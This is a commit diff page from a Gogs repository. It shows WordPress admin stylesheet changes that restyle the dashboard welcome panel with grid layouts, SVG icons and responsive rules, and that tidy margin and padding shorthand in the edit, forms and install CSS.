+	right: var(--about-header-bg-offset-inline);
160 
+	bottom: 0;
161 
+	width: var(--about-header-bg-width);
162 
+	height: auto;
163 
+}
164 
+
165 
+.welcome-panel-header-image svg {
166 
+	width: 100%;
167 
+	height: auto;
168 
+}
169 
+
170 
+.welcome-panel-header a {
171 
+	color: inherit;
172 
+}
173 
+
174 
+.welcome-panel-header a:focus,
175 
+.welcome-panel-header a:hover {
176 
+	color: inherit;
147 177 
 	text-decoration: none;
148 178 
 }
149 179
150 
-.welcome-panel .about-description {
151 
-	font-size: 16px;
152 
-	margin: 0;
180 
+.welcome-panel-header a:focus,
181 
+.welcome-panel .welcome-panel-close:focus {
182 
+	outline-color: currentColor;
183 
+	outline-offset: 1px;
184 
+	box-shadow: none;
185 
+}
186 
+
187 
+.welcome-panel-header p {
188 
+	margin: 0.5em 0 0;
189 
+	font-size: 20px;
190 
+	line-height: 1.4;
153 191 
 }
154 192
155 193 
 .welcome-panel .welcome-panel-close {
156 194 
 	position: absolute;
157 195 
 	top: 10px;
158 196 
 	right: 10px;
159 
-	padding: 10px 15px 10px 21px;
197 
+	padding: 10px 15px 10px 24px;
160 198 
 	font-size: 13px;
161 199 
 	line-height: 1.23076923; /* Chrome rounding, needs to be 16px equivalent */
162 200 
 	text-decoration: none;
201 
+	z-index: 1; /* Raise above the version image. */
163 202 
 }
164 203
165 204 
 .welcome-panel .welcome-panel-close:before {
 
@@ -167,8 +206,23 @@
167 206 
 	top: 8px;
168 207 
 	left: 0;
169 208 
 	transition: all .1s ease-in-out;
209 
+	content: '\f335';
210 
+	font-size: 24px;
211 
+	color: #1d2327;
170 212 
 }
171 213
214 
+.welcome-panel .welcome-panel-close {
215 
+	color: #1d2327;
216 
+}
217 
+
218 
+.welcome-panel .welcome-panel-close:hover,
219 
+.welcome-panel .welcome-panel-close:focus,
220 
+.welcome-panel .welcome-panel-close:hover::before,
221 
+.welcome-panel .welcome-panel-close:focus::before {
222 
+	color: #2271b1;
223 
+}
224 
+
225 
+/* @deprecated 5.9.0 -- Button removed from panel. */
172 226 
 .wp-core-ui .welcome-panel .button.button-hero {
173 227 
 	margin: 15px 13px 3px 0;
174 228 
 	padding: 12px 36px;
 
@@ -178,54 +232,98 @@
178 232 
 }
179 233
180 234 
 .welcome-panel-content {
181 
-	margin-left: 13px;
235 
+	min-height: 400px;
236 
+	display: flex;
237 
+	flex-direction: column;
238 
+	justify-content: space-between;
239 
+}
240 
+
241 
+.welcome-panel-header {
242 
+	box-sizing: border-box;
243 
+	margin-left: auto;
244 
+	margin-right: auto;
182 245 
 	max-width: 1500px;
246 
+	width: 100%;
247 
+	padding: 48px 0 80px 48px;
248 
+	padding-right: calc(var(--about-header-bg-width) + (var(--about-header-bg-offset-inline) * 2));
183 249 
 }
184 250
185 251 
 .welcome-panel .welcome-panel-column-container {
252 
+	box-sizing: border-box;
253 
+	width: 100%;
186 254 
 	clear: both;
187 
-	position: relative;
255 
+	display: grid;
256 
+	z-index: 1;
257 
+	padding: 48px;
258 
+	grid-template-columns: repeat(3, 1fr);
259 
+	gap: 32px;
260 
+	align-self: flex-end;
261 
+	background: #fff;
188 262 
 }
189 263
190 
-.welcome-panel .welcome-panel-column {
191 
-	width: 32%;
192 
-	min-width: 200px;
193 
-	float: left;
264 
+[class*="welcome-panel-icon"] {
265 
+	height: 60px;
266 
+	width: 60px;
267 
+	background-color: #1d2327;
268 
+	background-position: center;
269 
+	background-size: 24px 24px;
270 
+	background-repeat: no-repeat;
271 
+	border-radius: 100%;
272 
+}
273 
+
274 
+.welcome-panel-column {
275 
+	display: grid;
276 
+	grid-template-columns: min-content 1fr;
277 
+	gap: 24px;
194 278 
 }
195 279
196 
-.welcome-panel .welcome-panel-column:first-child {
197 
-	width: 36%;
280 
+.welcome-panel-icon-pages {
281 
+	background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M7 13.8h6v-1.5H7v1.5zM18 16V4c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v12c0 1.1.9 2 2 2h10c1.1 0 2-.9 2-2zM5.5 16V4c0-.3.2-.5.5-.5h10c.3 0 .5.2.5.5v12c0 .3-.2.5-.5.5H6c-.3 0-.5-.2-.5-.5zM7 10.5h8V9H7v1.5zm0-3.3h8V5.8H7v1.4zM20.2 6v13c0 .7-.6 1.2-1.2 1.2H8v1.5h11c1.5 0 2.7-1.2 2.7-2.8V6h-1.5z' /%3E%3C/svg%3E");
198 282 
 }
199 283
200 
-.welcome-panel-column p.hide-if-no-customize {
201 
-	margin-top: 10px;
284 
+.welcome-panel-icon-layout {
285 
+	background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24'%3E%3Cpath fill='%23fff' d='M18 5.5H6a.5.5 0 00-.5.5v3h13V6a.5.5 0 00-.5-.5zm.5 5H10v8h8a.5.5 0 00.5-.5v-7.5zm-10 0h-3V18a.5.5 0 00.5.5h2.5v-8zM6 4h12a2 2 0 012 2v12a2 2 0 01-2 2H6a2 2 0 01-2-2V6a2 2 0 012-2z' /%3E%3C/svg%3E");
202 286 
 }
203 287
204 
-.welcome-panel-column p {
205 
-	margin-top: 7px;
206 
-	color: #3c434a;
288 
+.welcome-panel-icon-styles {
289 
+	background-image: url("data:image/svg+xml,%3Csvg viewBox='0 0 24 24' xmlns='http://www.w3.org/2000/svg'%3E%3Cpath fill='%23fff' d='M12 4c-4.4 0-8 3.6-8 8v.1c0 4.1 3.2 7.5 7.2 7.9h.8c4.4 0 8-3.6 8-8s-3.6-8-8-8zm0 15V5c3.9 0 7 3.1 7 7s-3.1 7-7 7z' /%3E%3C/svg%3E");
207 290 
 }
208 291
292 
+/* @deprecated 5.9.0 -- Section removed from welcome panel. */
209 293 
 .welcome-panel .welcome-widgets-menus {
210 294 
 	line-height: 1.14285714;
211 295 
 }
212 296
297 
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
213 298 
 .welcome-panel .welcome-panel-column ul {
214 299 
 	margin: 0.8em 1em 1em 0;
215 300 
 }
216 301
302 
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
303 
+.welcome-panel li {
304 
+	font-size: 14px;
305 
+}
306 
+
307 
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
308 
+.welcome-panel li a {
309 
+	text-decoration: none;
310 
+}
311 
+
312 
+/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
217 313 
 .welcome-panel .welcome-panel-column li {
218 314 
 	line-height: 1.14285714;
219 315 
 	list-style-type: none;
220 316 
 	padding: 0 0 8px;
221 317 
 }
222 318
319 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
223 320 
 .welcome-panel .welcome-icon {
224 321 
 	background: transparent !important;
225 322 
 }
226 323
227 324 
 /* Welcome Panel and Right Now common Icons style */
228 325
326 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
229 327 
 .welcome-panel .welcome-icon:before,
230 328 
 #dashboard_right_now li a:before,
231 329 
 #dashboard_right_now li span:before,
 
@@ -244,47 +342,56 @@
244 342
245 343 
 /* Welcome Panel specific Icons styles */
246 344
345 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
247 346 
 .welcome-panel .welcome-write-blog:before,
248 347 
 .welcome-panel .welcome-edit-page:before {
249 348 
 	content: "\f119";
250 349 
 	top: -3px;
251 350 
 }
252 351
352 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
253 353 
 .welcome-panel .welcome-add-page:before {
254 354 
 	content: "\f132";
255 355 
 	top: -1px;
256 356 
 }
257 357
358 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
258 359 
 .welcome-panel .welcome-setup-home:before {
259 360 
 	content: "\f102";
260 361 
 	top: -1px;
261 362 
 }
262 363
364 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
263 365 
 .welcome-panel .welcome-view-site:before {
264 366 
 	content: "\f115";
265 367 
 	top: -2px;
266 368 
 }
267 369
370 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
268 371 
 .welcome-panel .welcome-widgets-menus:before {
269 372 
 	content: "\f116";
270 373 
 	top: -2px;
271 374 
 }
272 375
376 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
273 377 
 .welcome-panel .welcome-widgets:before {
274 378 
 	content: "\f538";
275 379 
 	top: -2px;
276 380 
 }
277 381
382 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
278 383 
 .welcome-panel .welcome-menus:before {
279 384 
 	content: "\f163";
280 385 
 	top: -2px;
281 386 
 }
282 387
388 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
283 389 
 .welcome-panel .welcome-comments:before {
284 390 
 	content: "\f117";
285 391 
 	top: -1px;
286 392 
 }
287 393
394 
+/* @deprecated 5.9.0 -- Icons removed from welcome panel. */
288 395 
 .welcome-panel .welcome-learn-more:before {
289 396 
 	content: "\f118";
290 397 
 	top: -1px;
 
@@ -354,7 +461,7 @@
354 461 
 .community-events-errors [aria-hidden="true"],
355 462 
 .community-events-loading[aria-hidden="true"],
356 463 
 .community-events[aria-hidden="true"],
357 
-.community-events [aria-hidden="true"] {
464 
+.community-events form[aria-hidden="true"] {
358 465 
 	display: none;
359 466 
 }
360 467 
 
@@ -518,7 +625,7 @@ body #dashboard-widgets .postbox form .submit {
518 625
519 626 
 #dashboard_primary .rss-widget {
520 627 
 	font-size: 13px;
521 
-	padding: 0 12px 0;
628 
+	padding: 0 12px;
522 629 
 }
523 630
524 631 
 #dashboard_primary .rss-widget:last-child {
 
@@ -599,7 +706,7 @@ body #dashboard-widgets .postbox form .submit {
599 706 
 	color: #50575e;
600 707 
 	background: #f6f7f7;
601 708 
 	border-top: 1px solid #f0f0f1;
602 
-	padding: 10px 12px 6px 12px;
709 
+	padding: 10px 12px 6px;
603 710 
 }
604 711
605 712 
 #dashboard_right_now .sub h3 {
 
@@ -835,7 +942,7 @@ body #dashboard-widgets .postbox form .submit {
835 942 
 }
836 943
837 944 
 #activity-widget #the-comment-list .comment-item p.row-actions {
838 
-	margin: 4px 0 0 0;
945 
+	margin: 4px 0 0;
839 946 
 }
840 947
841 948 
 #activity-widget #the-comment-list .comment-item:first-child {
 
@@ -1102,6 +1209,18 @@ a.rsswidget {
1102 1209 
 /* =Media Queries
1103 1210 
 -------------------------------------------------------------- */
1104 1211
1212 
+@media only screen and (min-width: 1600px) {
1213 
+	.welcome-panel .welcome-panel-column-container {
1214 
+		display: flex;
1215 
+		justify-content: center;
1216 
+	}
1217 
+
1218 
+	.welcome-panel-column {
1219 
+		width: 100%;
1220 
+		max-width: 460px;
1221 
+	}
1222 
+}
1223 
+
1105 1224 
 /* one column on the dash */
1106 1225 
 @media only screen and (max-width: 799px) {
1107 1226 
 	#wpbody-content #dashboard-widgets .postbox-container {
 
@@ -1213,25 +1332,67 @@ a.rsswidget {
1213 1332 
 }
1214 1333
1215 1334 
 @media screen and (max-width: 870px) {
1216 
-	.welcome-panel .welcome-panel-column,
1217 
-	.welcome-panel .welcome-panel-column:first-child {
1218 
-		display: block;
1219 
-		float: none;
1220 
-		width: 100%;
1221 
-	}
1222 
-
1335 
+	/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
1223 1336 
 	.welcome-panel .welcome-panel-column li {
1224 1337 
 		display: inline-block;
1225 1338 
 		margin-right: 13px;
1226 1339 
 	}
1227 1340
1341 
+	/* @deprecated 5.9.0 -- Lists removed from welcome panel. */
1228 1342 
 	.welcome-panel .welcome-panel-column ul {
1229 1343 
 		margin: 0.4em 0 0;
1230 1344 
 	}
1231 1345
1232 1346 
 }
1233 1347
1348 
+@media screen and (max-width: 1180px) and (min-width: 783px) {
1349 
+	.welcome-panel-column {
1350 
+		grid-template-columns: 1fr;
1351 
+	}
1352 
+
1353 
+	[class*="welcome-panel-icon"] {
1354 
+		display: none;
1355 
+	}
1356 
+}
1357 
+
1234 1358 
 @media screen and (max-width: 782px) {
1359 
+	.welcome-panel-header {
1360 
+		--about-header-bg-width: calc(var(--about-header-image-width) * 0.4);
1361 
+		--about-header-bg-offset-inline: 1rem;
1362 
+	}
1363 
+
1364 
+	.welcome-panel-header-image {
1365 
+		top: 2rem;
1366 
+	}
1367 
+
1368 
+	.welcome-panel .welcome-panel-column-container {
1369 
+		grid-template-columns: 1fr;
1370 
+		box-sizing: border-box;
1371 
+		padding: 32px;
1372 
+		width: 100%;
1373 
+	}
1374 
+
1375 
+	.welcome-panel .welcome-panel-column-content {
1376 
+		max-width: 520px;
1377 
+	}
1378 
+
1379 
+	/* Keep the close icon from overlapping the Welcome text. */
1380 
+	.welcome-panel .welcome-panel-close {
1381 
+		overflow: hidden;
1382 
+		text-indent: 40px;
1383 
+		white-space: nowrap;
1384 
+		width: 20px;
1385 
+		height: 20px;
1386 
+		padding: 5px;
1387 
+		top: 5px;
1388 
+		right: 5px;
1389 
+	}
1390 
+
1391 
+	.welcome-panel .welcome-panel-close::before {
1392 
+		top: 5px;
1393 
+		left: -35px;
1394 
+	}
1395 
+
1235 1396 
 	#dashboard-widgets h2 {
1236 1397 
 		padding: 12px;
1237 1398 
 	}
 
@@ -1274,23 +1435,28 @@ a.rsswidget {
1274 1435
1275 1436 
 /* Smartphone */
1276 1437 
 @media screen and (max-width: 600px) {
1277 
-	/* Keep the close icon from overlapping the Welcome text. */
1278 
-	.welcome-panel .welcome-panel-close {
1279 
-		overflow: hidden;
1280 
-		text-indent: 40px;
1281 
-		white-space: nowrap;
1282 
-		width: 20px;
1283 
-		height: 20px;
1284 
-		padding: 5px;
1285 
-		top: 5px;
1286 
-		right: 5px;
1438 
+	.welcome-panel-header {
1439 
+		padding: 32px 32px 64px;
1287 1440 
 	}
1288 1441
1289 
-	/* Make the close icon larger for tappability. */
1290 
-	.welcome-panel .welcome-panel-close:before {
1291 
-		font-size: 20px;
1292 
-		top: 5px;
1293 
-		left: -35px;
1442 
+	.welcome-panel-header-image {
1443 
+		display: none;
1444 
+	}
1445 
+}
1446 
+
1447 
+@media screen and (max-width: 480px) {
1448 
+	.welcome-panel-column {
1449 
+		gap: 16px;
1450 
+	}
1451 
+}
1452 
+
1453 
+@media screen and (max-width: 360px) {
1454 
+	.welcome-panel-column {
1455 
+		grid-template-columns: 1fr;
1456 
+	}
1457 
+
1458 
+	[class*="welcome-panel-icon"] {
1459 
+		display: none;
1294 1460 
 	}
1295 1461 
 }
1296 1462

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/dashboard.min.css


+ 1 - 1
app/wp-admin/css/deprecated-media-rtl.css
Ver Arquivo 

@@ -101,7 +101,7 @@ th {
101 101 
 	width: 100%;
102 102 
 	border: none;
103 103 
 	text-align: justify;
104 
-	margin: 0 0 1em 0;
104 
+	margin: 0 0 1em;
105 105 
 	padding: 0;
106 106 
 }
107 107

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/deprecated-media-rtl.min.css


+ 1 - 1
app/wp-admin/css/deprecated-media.css
Ver Arquivo 

@@ -100,7 +100,7 @@ th {
100 100 
 	width: 100%;
101 101 
 	border: none;
102 102 
 	text-align: justify;
103 
-	margin: 0 0 1em 0;
103 
+	margin: 0 0 1em;
104 104 
 	padding: 0;
105 105 
 }
106 106

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/deprecated-media.min.css


+ 17 - 11
app/wp-admin/css/edit-rtl.css
Ver Arquivo 

@@ -98,6 +98,12 @@ input#link_url {
98 98 
 	color: #646970;
99 99 
 }
100 100
101 
+#sample-permalink {
102 
+	display: inline-block;
103 
+	max-width: 100%;
104 
+	word-wrap: break-word;
105 
+}
106 
+
101 107 
 #edit-slug-box .cancel {
102 108 
 	margin-left: 10px;
103 109 
 	padding: 0;
 
@@ -147,6 +153,11 @@ body.post-new-php .submitbox .submitdelete {
147 153 
 	margin-top: 3px;
148 154 
 }
149 155
156 
+body.post-type-wp_navigation div#minor-publishing,
157 
+body.post-type-wp_navigation .inline-edit-status {
158 
+	display: none;
159 
+}
160 
+
150 161 
 /* Post Screen */
151 162
152 163 
 /* Only highlight drop zones when dragging and only in the 2 columns layout. */
 
@@ -451,7 +462,7 @@ form#tags-filter {
451 462 
 }
452 463
453 464 
 .curtime #timestamp {
454 
-	padding: 2px 0 1px 0;
465 
+	padding: 2px 0 1px;
455 466 
 	display: inline !important;
456 467 
 	height: auto !important;
457 468 
 }
 
@@ -651,7 +662,7 @@ form#tags-filter {
651 662 
 }
652 663
653 664 
 #poststuff .inside {
654 
-	margin: 6px 0 0 0;
665 
+	margin: 6px 0 0;
655 666 
 }
656 667
657 668 
 .link-php #poststuff .inside,
 
@@ -722,7 +733,7 @@ form#tags-filter {
722 733 
 	font-weight: 600;
723 734 
 	margin: 0 0.8rem 1rem;
724 735 
 	font-size: 23px;
725 
-	padding: 9px 0 4px 0;
736 
+	padding: 9px 0 4px;
726 737 
 	line-height: 1.3;
727 738 
 }
728 739 
 
@@ -1364,7 +1375,7 @@ p.description code {
1364 1375 
 }
1365 1376
1366 1377 
 #poststuff .tagsdiv .howto {
1367 
-	margin: 1em 0 6px 0;
1378 
+	margin: 1em 0 6px;
1368 1379 
 }
1369 1380
1370 1381 
 .ajaxtag .newtag {
 
@@ -1773,7 +1784,7 @@ table.links-table {
1773 1784 
 	}
1774 1785
1775 1786 
 	#titlediv #title-prompt-text {
1776 
-		padding: 10px 10px;
1787 
+		padding: 10px;
1777 1788 
 	}
1778 1789
1779 1790 
 	#poststuff .stuffbox .inside {
 
@@ -1956,12 +1967,7 @@ table.links-table {
1956 1967 
 	}
1957 1968
1958 1969 
 	.misc-pub-section {
1959 
-		padding: 20px 10px 20px;
1960 
-	}
1961 
-
1962 
-	.misc-pub-section > a {
1963 
-		float: left;
1964 
-		font-size: 16px;
1970 
+		padding: 20px 10px;
1965 1971 
 	}
1966 1972
1967 1973 
 	#delete-action,

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/edit-rtl.min.css


+ 17 - 11
app/wp-admin/css/edit.css
Ver Arquivo 

@@ -97,6 +97,12 @@ input#link_url {
97 97 
 	color: #646970;
98 98 
 }
99 99
100 
+#sample-permalink {
101 
+	display: inline-block;
102 
+	max-width: 100%;
103 
+	word-wrap: break-word;
104 
+}
105 
+
100 106 
 #edit-slug-box .cancel {
101 107 
 	margin-right: 10px;
102 108 
 	padding: 0;
 
@@ -146,6 +152,11 @@ body.post-new-php .submitbox .submitdelete {
146 152 
 	margin-top: 3px;
147 153 
 }
148 154
155 
+body.post-type-wp_navigation div#minor-publishing,
156 
+body.post-type-wp_navigation .inline-edit-status {
157 
+	display: none;
158 
+}
159 
+
149 160 
 /* Post Screen */
150 161
151 162 
 /* Only highlight drop zones when dragging and only in the 2 columns layout. */
 
@@ -450,7 +461,7 @@ form#tags-filter {
450 461 
 }
451 462
452 463 
 .curtime #timestamp {
453 
-	padding: 2px 0 1px 0;
464 
+	padding: 2px 0 1px;
454 465 
 	display: inline !important;
455 466 
 	height: auto !important;
456 467 
 }
 
@@ -650,7 +661,7 @@ form#tags-filter {
650 661 
 }
651 662
652 663 
 #poststuff .inside {
653 
-	margin: 6px 0 0 0;
664 
+	margin: 6px 0 0;
654 665 
 }
655 666
656 667 
 .link-php #poststuff .inside,
 
@@ -721,7 +732,7 @@ form#tags-filter {
721 732 
 	font-weight: 600;
722 733 
 	margin: 0 0.8rem 1rem;
723 734 
 	font-size: 23px;
724 
-	padding: 9px 0 4px 0;
735 
+	padding: 9px 0 4px;
725 736 
 	line-height: 1.3;
726 737 
 }
727 738 
 
@@ -1363,7 +1374,7 @@ p.description code {
1363 1374 
 }
1364 1375
1365 1376 
 #poststuff .tagsdiv .howto {
1366 
-	margin: 1em 0 6px 0;
1377 
+	margin: 1em 0 6px;
1367 1378 
 }
1368 1379
1369 1380 
 .ajaxtag .newtag {
 
@@ -1772,7 +1783,7 @@ table.links-table {
1772 1783 
 	}
1773 1784
1774 1785 
 	#titlediv #title-prompt-text {
1775 
-		padding: 10px 10px;
1786 
+		padding: 10px;
1776 1787 
 	}
1777 1788
1778 1789 
 	#poststuff .stuffbox .inside {
 
@@ -1955,12 +1966,7 @@ table.links-table {
1955 1966 
 	}
1956 1967
1957 1968 
 	.misc-pub-section {
1958 
-		padding: 20px 10px 20px;
1959 
-	}
1960 
-
1961 
-	.misc-pub-section > a {
1962 
-		float: right;
1963 
-		font-size: 16px;
1969 
+		padding: 20px 10px;
1964 1970 
 	}
1965 1971
1966 1972 
 	#delete-action,

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/edit.min.css


+ 15 - 8
app/wp-admin/css/forms-rtl.css
Ver Arquivo 

@@ -33,7 +33,7 @@ select {
33 33 
 }
34 34
35 35 
 textarea.code {
36 
-	padding: 4px 6px 1px 6px;
36 
+	padding: 4px 6px 1px;
37 37 
 }
38 38
39 39 
 input[type="text"],
 
@@ -1000,8 +1000,8 @@ table.form-table td .updated p {
1000 1000
1001 1001 
 .pressthis-bookmarklet span {
1002 1002 
 	display: inline-block;
1003 
-	margin: 0px 0 0;
1004 
-	padding: 0px 9px 8px 12px;
1003 
+	margin: 0;
1004 
+	padding: 0 9px 8px 12px;
1005 1005 
 }
1006 1006
1007 1007 
 .pressthis-bookmarklet span:before {
 
@@ -1226,7 +1226,7 @@ table.form-table td .updated p {
1226 1226 
 }
1227 1227
1228 1228 
 .request-filesystem-credentials-form .notice {
1229 
-	margin: 0 0 20px 0;
1229 
+	margin: 0 0 20px;
1230 1230 
 	clear: both;
1231 1231 
 }
1232 1232 
 
@@ -1237,11 +1237,14 @@ table.form-table td .updated p {
1237 1237 
 	margin-bottom: 1.3em;
1238 1238 
 }
1239 1239
1240 
-.tools-privacy-policy-page input.button,
1241 
-.tools-privacy-policy-page select {
1240 
+.tools-privacy-policy-page input.button {
1242 1241 
 	margin: 0 6px 0 1px;
1243 1242 
 }
1244 1243
1244 
+.tools-privacy-policy-page select {
1245 
+	margin: 0 6px 0.5em 1px;
1246 
+}
1247 
+
1245 1248 
 .tools-privacy-edit {
1246 1249 
 	margin: 1.5em 0;
1247 1250 
 }
 
@@ -1526,6 +1529,10 @@ table.form-table td .updated p {
1526 1529 
 		margin: 0 3px;
1527 1530 
 	}
1528 1531
1532 
+	.form-table .regular-text ~ input[type="text"].small-text {
1533 
+		margin-top: 5px;
1534 
+	}
1535 
+
1529 1536 
 	#pass-strength-result {
1530 1537 
 		width: 100%;
1531 1538 
 		box-sizing: border-box;
 
@@ -1560,13 +1567,13 @@ table.form-table td .updated p {
1560 1567 
 	}
1561 1568
1562 1569 
 	.form-table th {
1563 
-		padding: 10px 0 0 0;
1570 
+		padding: 10px 0 0;
1564 1571 
 		border-bottom: 0;
1565 1572 
 	}
1566 1573
1567 1574 
 	.form-table td {
1568 1575 
 		margin-bottom: 0;
1569 
-		padding: 4px 0 6px 0;
1576 
+		padding: 4px 0 6px;
1570 1577 
 	}
1571 1578
1572 1579 
 	.form-table.permalink-structure td code {

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/forms-rtl.min.css


+ 15 - 8
app/wp-admin/css/forms.css
Ver Arquivo 

@@ -32,7 +32,7 @@ select {
32 32 
 }
33 33
34 34 
 textarea.code {
35 
-	padding: 4px 6px 1px 6px;
35 
+	padding: 4px 6px 1px;
36 36 
 }
37 37
38 38 
 input[type="text"],
 
@@ -999,8 +999,8 @@ table.form-table td .updated p {
999 999
1000 1000 
 .pressthis-bookmarklet span {
1001 1001 
 	display: inline-block;
1002 
-	margin: 0px 0 0;
1003 
-	padding: 0px 12px 8px 9px;
1002 
+	margin: 0;
1003 
+	padding: 0 12px 8px 9px;
1004 1004 
 }
1005 1005
1006 1006 
 .pressthis-bookmarklet span:before {
 
@@ -1225,7 +1225,7 @@ table.form-table td .updated p {
1225 1225 
 }
1226 1226
1227 1227 
 .request-filesystem-credentials-form .notice {
1228 
-	margin: 0 0 20px 0;
1228 
+	margin: 0 0 20px;
1229 1229 
 	clear: both;
1230 1230 
 }
1231 1231 
 
@@ -1236,11 +1236,14 @@ table.form-table td .updated p {
1236 1236 
 	margin-bottom: 1.3em;
1237 1237 
 }
1238 1238
1239 
-.tools-privacy-policy-page input.button,
1240 
-.tools-privacy-policy-page select {
1239 
+.tools-privacy-policy-page input.button {
1241 1240 
 	margin: 0 1px 0 6px;
1242 1241 
 }
1243 1242
1243 
+.tools-privacy-policy-page select {
1244 
+	margin: 0 1px 0.5em 6px;
1245 
+}
1246 
+
1244 1247 
 .tools-privacy-edit {
1245 1248 
 	margin: 1.5em 0;
1246 1249 
 }
 
@@ -1525,6 +1528,10 @@ table.form-table td .updated p {
1525 1528 
 		margin: 0 3px;
1526 1529 
 	}
1527 1530
1531 
+	.form-table .regular-text ~ input[type="text"].small-text {
1532 
+		margin-top: 5px;
1533 
+	}
1534 
+
1528 1535 
 	#pass-strength-result {
1529 1536 
 		width: 100%;
1530 1537 
 		box-sizing: border-box;
 
@@ -1559,13 +1566,13 @@ table.form-table td .updated p {
1559 1566 
 	}
1560 1567
1561 1568 
 	.form-table th {
1562 
-		padding: 10px 0 0 0;
1569 
+		padding: 10px 0 0;
1563 1570 
 		border-bottom: 0;
1564 1571 
 	}
1565 1572
1566 1573 
 	.form-table td {
1567 1574 
 		margin-bottom: 0;
1568 
-		padding: 4px 0 6px 0;
1575 
+		padding: 4px 0 6px;
1569 1576 
 	}
1570 1577
1571 1578 
 	.form-table.permalink-structure td code {

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/forms.min.css


+ 3 - 3
app/wp-admin/css/install-rtl.css
Ver Arquivo 

@@ -10,7 +10,7 @@ body {
10 10 
 	color: #3c434a;
11 11 
 	font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
12 12 
 	margin: 140px auto 25px;
13 
-	padding: 20px 20px 10px 20px;
13 
+	padding: 20px 20px 10px;
14 14 
 	max-width: 700px;
15 15 
 	-webkit-font-smoothing: subpixel-antialiased;
16 16 
 	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
 
@@ -79,7 +79,7 @@ label {
79 79
80 80 
 #logo {
81 81 
 	margin: -130px auto 25px;
82 
-	padding: 0 0 25px 0;
82 
+	padding: 0 0 25px;
83 83 
 	width: 84px;
84 84 
 	height: 84px;
85 85 
 	overflow: hidden;
 
@@ -142,7 +142,7 @@ textarea {
142 142 
 }
143 143
144 144 
 .form-table p {
145 
-	margin: 4px 0 0 0;
145 
+	margin: 4px 0 0;
146 146 
 	font-size: 11px;
147 147 
 }
148 148

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/install-rtl.min.css


+ 3 - 3
app/wp-admin/css/install.css
Ver Arquivo 

@@ -9,7 +9,7 @@ body {
9 9 
 	color: #3c434a;
10 10 
 	font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Oxygen-Sans, Ubuntu, Cantarell, "Helvetica Neue", sans-serif;
11 11 
 	margin: 140px auto 25px;
12 
-	padding: 20px 20px 10px 20px;
12 
+	padding: 20px 20px 10px;
13 13 
 	max-width: 700px;
14 14 
 	-webkit-font-smoothing: subpixel-antialiased;
15 15 
 	box-shadow: 0 1px 1px rgba(0, 0, 0, 0.04);
 
@@ -78,7 +78,7 @@ label {
78 78
79 79 
 #logo {
80 80 
 	margin: -130px auto 25px;
81 
-	padding: 0 0 25px 0;
81 
+	padding: 0 0 25px;
82 82 
 	width: 84px;
83 83 
 	height: 84px;
84 84 
 	overflow: hidden;
 
@@ -141,7 +141,7 @@ textarea {
141 141 
 }
142 142
143 143 
 .form-table p {
144 
-	margin: 4px 0 0 0;
144 
+	margin: 4px 0 0;
145 145 
 	font-size: 11px;
146 146 
 }
147 147

Diferenças do arquivo suprimidas por serem muito extensas
+ 1 - 1
app/wp-admin/css/install.min.css


+ 0 - 0
app/wp-admin/css/list-tables-rtl.css
Ver Arquivo


Alguns arquivos não foram mostrados porque muitos arquivos mudaram nesse diff

tum/tmt_learning - Gogs: Simplico Git Service
Startseite Erkunden Hilfe
Anmelden
tum
/
tmt_learning
Beobachten 1
Favorit hinzufügen 0
Fork 0
Code Issues 0 Pull-Requests 0 Commits 8 Releases 0 Wiki
Struktur: 6f337d0a21
Branches Tags

1 Commits (6f337d0a21bd600b37e67ff4f8517676d8b4089d)

Autor SHA1 Nachricht Datum
  Prach Pongpanich 6f337d0a21 install tailwind alpine daisyui vor 2 Jahren